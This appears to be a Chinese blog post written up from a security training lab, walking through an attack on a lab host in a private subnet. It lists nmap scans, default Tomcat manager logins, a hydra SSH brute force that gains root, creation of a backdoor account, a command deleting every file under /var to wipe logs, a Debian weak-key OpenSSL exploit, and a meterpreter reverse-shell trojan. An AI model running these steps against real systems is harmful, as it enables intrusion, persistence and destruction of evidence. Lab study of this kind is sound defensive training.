局域網攻擊演示(網安實訓第五天)

 

局域網攻擊演示

(1)信息收集

1對局域網進行主機發現掃描:php

nmap -sP 192.168.183.0/24html

2肯定攻擊目標:本機ip地址爲129,內網中還存在另外一臺主機,ip爲134,這就是咱們的目標,咱們對它進一步掃描。python

nmap -sV 192.168.183.134mysql

經過分析,咱們發現:目標主機開啓大量可利用端口,ftp、ssh、telnet、smtp、mysql能夠進行暴力破解,對方主機也開啓了80端口,apache版本爲2.2.8,php版本爲5.2.4。linux

3放大招,使用nessus進行漏洞掃描。web

4在web掃描這裏,我發現一些嚴重漏洞,這一個能夠直接登錄進去:sql


在這裏,咱們發現如下信息:shell

  網址:http://192.168.183.134:8180/manager/htmlapache

  用戶名:tomcatubuntu

  密碼:tomcat

  網址:http://192.168.183.134:8180/host-manager/html

  用戶名:tomcat

  密碼:tomcat

  網址:http://192.168.183.134:8180/manager/status

  用戶名:tomcat

  密碼:tomcat

好像發現了新大陸,咱們繼續尋找可用信息。

咱們發現管理員路徑爲admin:

好像沒太大用,因爲時間比較緊,咱們進行下一步。

(2)漏洞發現

經過分析上一步的掃描結果,分析獲得如下信息:

找到漏洞編號:

CVE:  CVE-2009-3099CVE-2009-3548CVE-2010-0557CVE-2010-4094

繼續尋找以前nessus的掃描結果,找到如下內容:

找到漏洞編號:

找到漏洞編號,cve-2008-0166

(3)滲透測試攻擊

1暴力破解

在掃描期間,咱們先用hydra暴力破解試試,說不定運氣好呢。

hydra -l root -P pass.txt –t 50 -e ns192.168.183.134 ssh

最開始使用上面命令,總是出現could not connect to target,查詢了發現時由於線程開太多,被對方封了,因此改爲1就能夠正常運行。

hydra -l root -P pass.txt -t 1 -vV192.168.183.134 ssh

Success: 'root':'ubuntu' 仍是root權限,接下來,直接用xshell鏈接就行了。

(5)建立帳戶

Useradd hack

Passwd hack

123

123

(6)清除日誌文件

find   /var   -type   f  -exec   rm   -v   {}   \;

經過暴力破解,咱們已經得到對方shell,這樣好像有點簡單。我想繼續根據以前獲取的信息進行攻擊。

2漏洞攻擊

Msfconsole搜索,發現並無:

找到cve官網關於本漏洞的說明:

直接下載利用說明:

根據文檔內容進行操做:

首先下載密鑰文件:

上傳到bt5並解壓:

使用/pentest/exploits/exploitdb/searchsploit openssl搜索利用腳本文件:

咱們隨表找一個,我這裏使用python腳本。

find / -name 5720.py

進入/pentest/exploits/exploitdb/platforms/linux/remote/,並執行破解:

python 5720.py /root/rsa/2048192.168.183.134 root

結果以下:

執行:

ssh -lroot -p22 -i/root/rsa/2048/57c3115d77c56390332dc5c49978627a-5429 192.168.183.134

成功獲取對方shell。

(4)植入木馬

生成木馬:

msfpayload linux/x86/meterpreter/reverse_tcpLHOST=192.168.183.129 LPORT=55555 X > runme

將木立刻傳至目標主機:

在攻擊機中開啓服務端:

若是目標機不當心運行了木馬文件,攻擊機便可得到反彈shell。

相關文章
相關標籤/搜索